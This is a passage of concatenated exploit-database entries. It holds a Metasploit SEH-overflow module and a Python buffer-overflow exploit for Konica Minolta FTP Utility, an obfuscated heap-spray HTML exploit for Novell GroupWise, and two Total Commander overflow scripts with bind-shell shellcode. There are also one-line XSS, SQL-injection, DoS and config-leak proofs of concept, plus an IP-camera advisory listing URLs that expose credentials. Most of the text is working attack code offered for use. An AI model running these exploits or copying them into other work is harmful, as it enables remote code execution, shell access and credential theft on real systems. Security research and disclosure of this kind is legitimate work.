leads to an SEH overflow. Konica FTP allows anonymous access by default; valid
credentials are typically unnecessary to exploit this vulnerability.
},
'Author' =>
[
'Shankar Damodaran', # stack buffer overflow dos p.o.c
'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EBD', '37908' ]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1500,
'BadChars' => "\x00\x0a\x2f\x5c",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 SP1 x86',
{
'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll
'Offset' => 1037
}
]
],
'DisclosureDate' => 'Aug 23 2015',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
connect_login
buf = rand_text(target['Offset'])
buf << generate_seh_record(target.ret)
buf << payload.encoded
buf << rand_text(3000)
print_status("Sending exploit buffer...")
send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string
handler
disconnect
end
end
# Title: Konica Minolta FTP Utility - Remote Command Execution
# Date : 20/09/2015
# Author: R-73eN
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows XP SP3
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Every command is vulnerable to buffer overflow.
import socket
import struct
shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f"
shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29"
shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f"
shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3"
shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92"
shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe"
shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3"
shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a"
shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff"
shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9"
shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18"
shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc"
shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60"
shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba"
shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53"
shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a"
shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3"
shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65"
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
nSEH = "\xEB\x13\x90\x90"
SEH = struct.pack('<L',0x1220401E)
evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
s.connect((server, 21))
a = s.recv(1024)
print ' [+] ' + a
s.send('User ' + evil )
print '[+] https://www.infogen.al/ [+]'
source: https://www.securityfocus.com/bid/57664/info
The WP-Table Reloaded plugin for WordPress is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP-Table Reloaded versions prior to 1.9.4 are vulnerable.
http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
source: https://www.securityfocus.com/bid/57657/info
Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities.
A remote attacker can leverage this issue to execute arbitrary code within the context of the application. Successful exploits will compromise the application, and possibly, the underlying computer.
The following versions are vulnerable:
Versions prior to 8.0.3 Hot Patch 2
Versions prior to GroupWise 2012 SP1 Hot Patch 1
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
<html>
<Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title>
<object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object>
<script language='javascript'>
function GyGguPonxZoADbtgXPS() {
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.KJZFzfumaV = "AAAA";
while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) {
this.KJZFzfumaV += this.KJZFzfumaV;
}
this.mem = new Array();
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) {
void(Math.atan2(0xbabe, msg));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) {
if (enable == true)
void(Math.atan(0xbabe));
else
void(Math.asin(0xbabe));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) {
void(Math.acos(0xbabe));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) {
if (len > this.KJZFzfumaV.length)
throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available";
return this.KJZFzfumaV.substr(0, len);
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) {
if (UWzqrDQwReXOllGssMYEzruQtomLp == 0)
throw "Round argument cannot be 0";
return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width)
{
var digits = "0123456789ABCDEF";
var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1);
while (num > 0xF) {
num = num >>> 4;
beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg;
}
var width = (width ? width : 0);
while (beTBwoiJGBBhwyZg.length < width)
beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg;
return beTBwoiJGBBhwyZg;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) {
return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (this.mem[tag] === undefined)
this.mem[tag] = new Array();
if (typeof arg == "string" || arg instanceof String) {
this.mem[tag].push(arg.substr(0, arg.length));
}
else {
this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2));
}
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) {
delete this.mem[tag];
CollectGarbage();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() {
this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache");
this.SWc("oleaut32");
for (var i = 0; i < 6; i++) {
this.nPdkLCpaz(32, "oleaut32");
this.nPdkLCpaz(64, "oleaut32");
this.nPdkLCpaz(256, "oleaut32");
this.nPdkLCpaz(32768, "oleaut32");
}
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768)
throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
this.nPdkLCpaz(arg, tag);
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) {
this.SWc(tag);
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() {
this.mNhbOXqosTNKjGhfj("Running the garbage collector");
CollectGarbage();
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) {
var count = (count ? count : 1);
for (var i = 0; i < count; i++) {
this.uYiBaSLpjlOJJdhFAb(arg);
this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR");
}
this.uYiBaSLpjlOJJdhFAb(arg);
this.K("ZsJjplNR");
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
var count = (count ? count : 1);
for (var i = 0; i < count; i++)
this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ");
this.K("WbjLbPsZ");
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg)
{
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
return this.heapBase + 0x688 + ((size+8)/8)*48;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) {
var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";
if (shellcode.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");
var udIUhjCc = unescape("%u9090%u7ceb")
for (var i = 0; i < 124/4; i++)
udIUhjCc += this.RBRfbU(jmpecx);
udIUhjCc += unescape("%u0028%u0028") +
shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length);
return udIUhjCc;
}
var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000);
var payload2 = unescape(
"%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" +
"%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" +
"%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" +
"%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" +
"%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" +
"%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" +
"");
var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090");
while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM;
offset_length = 0x5F6;
junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length);
var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(2, 0x40000 - 0x21);
for (var i=0; i < 250; i++) {
heap_obj.uYiBaSLpjlOJJdhFAb(block);
}
ctrl.InvokeContact(202116108)
</script>
</html>
source: https://www.securityfocus.com/bid/57602/info
MiniUPnP is prone to multiple denial-of-service vulnerabilities.
Attackers can exploit these issues to cause denial-of-service conditions.
MiniUPnP versions prior to 1.4 are vulnerable.
M-SEARCH * HTTP/1.1
Host:239.255.255.250:1900
ST:uuid:schemas:device:MX:3< no CRLF >
source: https://www.securityfocus.com/bid/57579/info
Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability.
Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks.
curl -v http://www.example.com/DVR.cfg | strings |grep -i USER
1. Adivisory Information
Title: ADH-Web Server IP-Cameras Improper Access Restrictions
EDB-ID: 38245
Advisory ID: OLSA-2015-0919
Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html
Date published: 2015-09-19
Date of last update: 2016-02-15
Vendors contacted: Dedicated Micros
2. Vulnerability Information
Class: Information Exposure [CWE-200]
Impact: Access Control Bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A
3. Vulnerability Description
Due to improper access restriction the ADH-Web device [1] allows a remote attacker to browse and access arbitrary files from the following directorie '/hdd0/logs'. You can also get numerous information (important for a fingerprint step) via the parameter variable in variable.cgi script [2].
Background:
Dedicated Micros’ ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click.
4. Vulnerable Packages
- SD Advanced Closed IPTV
- SD Advanced
- EcoSense
- Digital Sprite 2
5. Technical Description
[1] Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below:
(401): http://<target_ip>/hdd0/logs
(200): http://<target_ip>/hdd0/logs/log.txt
> Most common logfiles:
arc_log.txt
bak.txt
connect.txt
log.txt
seclog.log
startup.txt
DBGLOG.TXT
access.txt
security.txt
[2] Another problem identified is an information exposure via the parameter variable in variable.cgi script. Knowing some variables can extract a reasonable amount of information:
> DNS:
http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0
> ftp master ftp console credentials:
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
(although the vast majority of servers have ftp/telnet with anonymous access allowed.)
> alms
http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0
> camconfig
http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1
(includes, but is not limited to)
This servers also sends credentials (and other sensitive data) via GET parameters, this is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, very dangerous CSRF vectors).
6. Vendor Information, Solutions and Workarounds
The vendor found that some things are not vulnerabilities (sensitive information via GET, for example) and others are useless (hardcoded credentials) and others are not yet so critical (access to server logs). I think that at least this information can assist during an intrusion test, as will be shown soon.
7. Credits
These vulnerabilities has been discovered by Orwelllabs.
8. Report Timeline
2015-08-31: Vendor has been notified about the vulnerabilities (without details yet).
2015-09-01: Vendor acknowledges the receipt of the email and asks for technical details.
2015-09-01: A email with technical details is sent to vendor.
2015-09-11: Still no response, another email was sent to the Vendor requesting any opinion on the reported problems.
2015-09-11: The vendor reported that the matter was passed on to the team developed and that it would contact me the following week (2015-09-14).
2015-09-14: The development team responded by passing its consideration of the points andreported in accordance with this response the impact of these vulnerabilities is low and are no longer available unauthenticated using recent software release (version 10212).
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this information.
About Orwelllabs
++++++++++++++++
Orwelllabs is a security research lab interested in embedded device & webapp hacking.
We aims to create some intelligence around this vast and confusing picture that is the Internet of things.
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----
source: https://www.securityfocus.com/bid/57564/info
iCart Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
iCart Pro 4.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/forum/icart.php?do=editproduct&productid=19§ion='
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows 10
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'wb');
buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1"
"\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28"
"\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c"
"\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2"
"\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a"
"\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48"
"\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91"
"\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15"
"\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e"
"\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e"
"\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd"
"\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8"
"\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b"
"\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba"
"\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01"
"\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b"
"\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf"
"\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24"
"\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc"
"\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc"
"\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42"
"\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52"
"\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30"
"\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68")
buffer += "\x90" *10
file.write(buffer)
file.close()
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'w');
buffer = "\x90"*190
buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX
buffer += "\x90"*(265- len(buffer))
buffer += "\x47\x47\xf7\x75" #75F74747 FFE0 JMP EAX
# bad characters - \x00\x0a\x0d
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11"
"\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69"
"\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4"
"\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30"
"\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3"
"\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94"
"\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b"
"\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4"
"\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5"
"\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1"
"\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16"
"\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51"
"\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3"
"\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06"
"\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49"
"\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65"
"\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf"
"\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb"
"\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba"
"\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08"
"\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b"
"\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c"
"\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2")
file.write(buffer)
file.close()
source: https://www.securityfocus.com/bid/57463/info
Apache OFBiz is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Apache OFBiz versions prior to 10.04.05 and 11.04.02 are vulnerable.
GET
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script>
